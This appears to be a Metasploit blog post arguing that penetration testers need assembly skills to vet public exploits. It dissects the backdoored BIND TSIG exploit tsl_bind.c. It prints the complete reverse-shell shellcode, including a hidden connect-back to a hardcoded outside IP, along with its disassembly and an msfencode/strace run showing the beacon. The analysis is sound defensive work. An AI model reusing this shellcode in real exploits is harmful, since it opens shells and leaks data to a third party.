Last updated at Wed, 27 Sep 2017 21:00:38 GMT

This afternoon a question came up on the #metasploit IRC channel (irc.freenode.net). The questioner asked: "Should a good penetration tester know assembly?". This lead to some discussion about when and where assembly language skills become important in the scope of a penetration test. My normal response to "Should I learn [something]?" questions is always a resounding YES; it is hard to know too much as a penetration tester or system auditor.

Little things, like knowledge of beginner mistakes in configuration files, can go a long way to a successful penetration test. In the case of assembly, it helps, just like everything else does, but its not always required or even used frequently. Assembly language programming is mandatory for developing your own exploits and for tweaking others, but for the most part, it is not the defining factor in whether you will gain access to a network.

There is one critical task where deep knowledge of assembly (and C) is required; validating public exploits. Over the years, dozens of fake exploits have been released; some of these delete all of the files from the drive, while others install a persistent backdoor. There is one other class of backdoored exploits that you rarely hear about, but are still found on public exploit repositories. These exploits look correct, function correctly, but also provide the exploit author with access to the system you exploited. The tricky thing about these exploits is that to find the backdoor, you have to decode and understand the shellcode, which is invariably written in assembly language.

Lets go through a real-life example. In 2001, Gustavo Scotti of Tamandua Laboratories (now Axur Information Security) released an exploit for the BIND TSIG buffer overflow vulnerability published by Network Associates (now McAfee). This exploit, named tsl_bind.c can still be found on a number of exploit repositories, including PacketStorm. This exploit looks and works as advertised, except for one tiny thing. Lets take a closer look at the Linux shellcode in this exploit:

/* SHELLCODE - this is a connect back shellcode */
u8 shellcode[]=
"\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46"
"\x04\x97\xc4\x47\xa0\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89"
"\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
"\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90"
"\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59"
"\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46"
"\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86"
"\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06"
"\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0"
"\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62"
"\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46"
"\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
"\xcd\x80\x31\xc0\x40\xcd\x80";

Nothing too sinister jumps out at first glance, but lets actually look at the instructions:

00000000  3C90              cmp al,0x90
00000002  89E6              mov esi,esp
00000004  83C640            add esi,byte +0x40
00000007  C70602000BAC      mov dword [esi],0xac0b0002
0000000D  C7460497C447A0    mov dword [esi+0x4],0xa047c497
00000014  31C0              xor eax,eax
[snip]
00000058  7432              jz 0x8c
0000005A  8B0424            mov eax,[esp]
0000005D  894608            mov [esi+0x8],eax
00000060  90                nop
00000061  BD7F000001        mov ebp,0x100007f
00000066  896E04            mov [esi+0x4],ebp
00000069  C70603803586      mov dword [esi],0x86358003
0000006F  B804000000        mov eax,0x4

In the code above (see here for a full listing), we can see that there are actually TWO reverse connections. One which goes to 151.196.71.160 (0x97c447a0) and another that goes to 127.0.0.1 (0x7f000001). The 127.0.0.1 address is substituted when the exploit is run, but the first address is not. In essence, every time this exploit succeeds, it will provide you with a shell, but also connects back to the author's IP address and send a blob of information about the user running the exploit.

If you pipe the shellcode into Metasploit's msfencode, you can see it in action:

$ msfencode -e generic/none -a x86 -p linux -t elf -o tsl.bin < shellcode.raw
$ chmod +x ./tsl.bin
$ strace -f -qix ./tsl.bin
[ Process PID=15282 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(2988), sin_addr=inet_addr("151.196.71.160")}, 16
write(3, "\3\2005\206\177\0\0\1\1\0\0\0", 12) = 12
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(2987), sin_addr=inet_addr("127.0.0.1")}, 16) = 4
dup2(4, 0)                              = 0
dup2(4, 1)                              = 1
execve("/bin/sh",...)= 0

To add insult to injury, the backdoor IP gets the shellconnection first!

In summary, if you are using exploits from public repositories for your penetration testing engagements, you do need to learn assembly code. Intel x86 is a must, but also any other architecture you happen to test (PowerPC, SPARC, ARM, etc).

This is another reason to prefer the Metasploit Framework over an unveted public exploit. Every single exploit, encoder, nop generator, and payload in Metasploit has been reviewed by a member of the core team. A side effect of us converting public exploits into Metasploit modules is the review and analysis process. Public code is first broken down into the transport, vector, return address, and payload components, and each piece is then reimplemented using the Metasploit API. This process leads to reliable exploit code that doesn't depend on a specific payload or transport.

Update: A few folks have asked about getting started guides for x86 assembly. The resource I find useful is the tutorial section of Linux Assembly project. Once you have the basics down, take a look through the shellcode directory of the Metasploit Framework and study up with the NASM Manual.

Update: In addition to the comments below, the Programming From the Ground Up book was recommended, as well as the ASM Community web site.

Update: Based on gscotti's comments below (the original author), I clarified the post to indicate that only a reverse connect is made, not an actual shell. His comment states that over 30,000 IPs connected back since he released it.